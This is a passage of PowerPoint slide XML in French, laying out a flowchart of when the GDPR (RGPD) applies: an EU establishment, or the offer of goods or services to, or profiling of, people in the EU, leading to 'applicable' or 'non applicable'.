              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5230906" y="2154853"/>
            <a:ext cx="1730188" cy="1731982"/>
            <a:chOff x="4692128" y="2154852"/>
            <a:chExt cx="1730188" cy="1731982"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="18" name="Image 17">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0746034B-B216-4F43-B640-D993C6C91EBC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId3">
              <a:extLst>
                <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                  <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                </a:ext>
              </a:extLst>
            </a:blip>
            <a:srcRect l="28020" t="22605" r="27634" b="21682"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="4923723" y="2154852"/>
              <a:ext cx="1227026" cy="1233000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="Rectangle : coins arrondis 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1170B79-5E6A-45AD-83FA-2DC2E7AC9F14}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4692128" y="2154853"/>
              <a:ext cx="1730188" cy="1731981"/>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34</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>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695324" y="897753"/>
            <a:ext cx="10896041" cy="1575391"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>RGPD – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Les organismes concernés par l’application du RGPD</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="82" name="Straight Connector 8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 coins arrondis 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9548854-9F6F-4415-9AA7-A55A2E834549}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9359153" y="2154854"/>
            <a:ext cx="1559859" cy="173198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24603E22-4363-4068-B02E-19CCC500E764}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9359153" y="4661999"/>
            <a:ext cx="1559859" cy="173198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12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F5DF9E3-EFA3-46F9-92F7-C4F86F1F0828}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4970040" y="4661998"/>
            <a:ext cx="2333272" cy="2059471"/>
            <a:chOff x="4431262" y="2154852"/>
            <a:chExt cx="2333272" cy="2059471"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Rectangle : coins arrondis 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{597D1964-52B7-4BBF-9227-C8972D067298}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4431262" y="2154852"/>
              <a:ext cx="2333272" cy="2059471"/>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10FACE6D-596E-4C48-9217-CB3242D2BFBD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId4">
              <a:extLst>
                <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                  <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                </a:ext>
              </a:extLst>
            </a:blip>
            <a:srcRect t="9197" b="8048"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="4830847" y="2238643"/>
              <a:ext cx="1493518" cy="1235974"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="20" name="Groupe 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95B4D4D8-10C9-4563-8A99-8F3DA76DDC4D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7303312" y="2651512"/>
            <a:ext cx="1668566" cy="369332"/>
            <a:chOff x="7303312" y="2651512"/>
            <a:chExt cx="1668566" cy="369332"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="15" name="Connecteur droit avec flèche 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C1AECB3-DCF9-4E3E-BD2D-57E5CEE2EA1F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7303312" y="2980656"/>
              <a:ext cx="1668566"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1651717C-365A-433F-AE1C-1CBD5A275AFA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7980257" y="2651512"/>
              <a:ext cx="490840" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="fr-FR" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="0070C0"/>
                  </a:solidFill>
                  <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>oui</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="23" name="Groupe 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5738B888-2051-434E-BFD5-0EB92255B3A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="20034819">
            <a:off x="7303312" y="3733008"/>
            <a:ext cx="1646971" cy="806356"/>
            <a:chOff x="7231506" y="2577478"/>
            <a:chExt cx="1646971" cy="806356"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="24" name="Connecteur droit avec flèche 23">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA201C00-5C00-4279-99E3-85ABA5FF52C3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="1565181" flipV="1">
              <a:off x="7231506" y="2577478"/>
              <a:ext cx="1646971" cy="80635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394C3B2C-E933-4A65-9472-DD6B01BC5164}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7980257" y="2651512"/>
              <a:ext cx="490840" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="fr-FR" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="0070C0"/>
                  </a:solidFill>
                  <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>oui</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="28" name="Groupe 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{615798FA-A473-4E72-806B-03A078A98A3C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7303312" y="5287953"/>
            <a:ext cx="1668566" cy="369332"/>
            <a:chOff x="7303312" y="2651512"/>
            <a:chExt cx="1668566" cy="369332"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="29" name="Connecteur droit avec flèche 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{755692F2-B79F-48E5-9EC2-8EDE833565E4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7303312" y="2980656"/>
              <a:ext cx="1668566"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FE2CD7DC-2B60-4991-9643-1675CD9F5280}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7980257" y="2651512"/>
              <a:ext cx="566181" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="fr-FR"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non</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="33" name="Groupe 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03B737C8-29E6-4FB4-959D-57BD9AA64850}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="5400000">
            <a:off x="6026465" y="4013595"/>
            <a:ext cx="730627" cy="566181"/>
            <a:chOff x="7805683" y="2438990"/>
            <a:chExt cx="730627" cy="566181"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="34" name="Connecteur droit avec flèche 33">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C692EDD-94CA-4E67-9B54-D99A16BC3C24}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="16200000">
              <a:off x="8170997" y="2615343"/>
              <a:ext cx="0" cy="73062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D4C145A1-77E7-4A0E-A9C3-86923727A56B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="16200000">
              <a:off x="7821302" y="2537415"/>
              <a:ext cx="566181" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="fr-FR"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non</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="ZoneTexte 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D686C1E-4BE2-40B0-B2FB-D1469ED591CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5382740" y="3297916"/>
            <a:ext cx="1500924" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Etablissement </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>de l’UE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="ZoneTexte 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{044624AF-FAFC-4AD1-A581-59DB85991009}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4905492" y="5897231"/>
            <a:ext cx="2518382" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Offre de biens/service ou </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>profilage de personnes </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>sur le territoire de l’UE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="44" name="Groupe 43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1898D5E2-4C92-4C92-BE03-AD0D33213BDE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9402342" y="2443240"/>
            <a:ext cx="1473480" cy="1155209"/>
            <a:chOff x="9402342" y="2351303"/>
            <a:chExt cx="1473480" cy="1155209"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="40" name="ZoneTexte 39">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D68EDEB3-71AD-4C9A-8DF9-193DE2CE90A7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9402342" y="3167958"/>
              <a:ext cx="1473480" cy="338554"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>APPLICABLE</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="38" name="Graphique 37" descr="Coche avec un remplissage uni">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF82D2F3-518E-4156-885E-671ED5188B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81882" y="2351303"/>
              <a:ext cx="914400" cy="914400"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="45" name="Groupe 44">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C185C7EE-472A-48E9-A167-0A3F8381D097}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9519361" y="4848020"/>
            <a:ext cx="1239443" cy="1359939"/>
            <a:chOff x="9536985" y="4876246"/>
            <a:chExt cx="1239443" cy="1359939"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="41" name="ZoneTexte 40">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E46B5C68-05E1-451A-8511-1DA79B43C804}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9536985" y="5651410"/>
              <a:ext cx="1239443" cy="584775"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Non</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="fr-FR" sz="16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fr-FR" sz="1600" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>applicable</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="43" name="Graphique 42" descr="Fermer avec un remplissage uni">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D4FCBC5-A96E-46BE-8075-7CCB0CA811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99506" y="4876246"/>
              <a:ext cx="914400" cy="914400"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="51" name="Connecteur droit 50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3629D83-DF70-4099-859A-5AB29CD59D2A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4415883" y="2040673"/>
            <a:ext cx="0" cy="4680796"/>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100" name="Picture 4" descr="Certifications : HDS, DMP, MSSanté, CE, RGPD | Teranga Software">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7947D67A-6ABB-4E2C-B59D-11BAB0788F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4707" y="2117641"/>
            <a:ext cx="1715676" cy="1715676"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52" name="Accolade fermante 51">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{67FDE685-FF29-4535-A50F-FA5958D449D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="2126203" y="3596367"/>
            <a:ext cx="452684" cy="168572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7" name="ZoneTexte 56">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A43E00F1-2B61-4416-A192-FEA36A5B719D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="698205" y="4891711"/>
            <a:ext cx="1518556" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Critère de</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
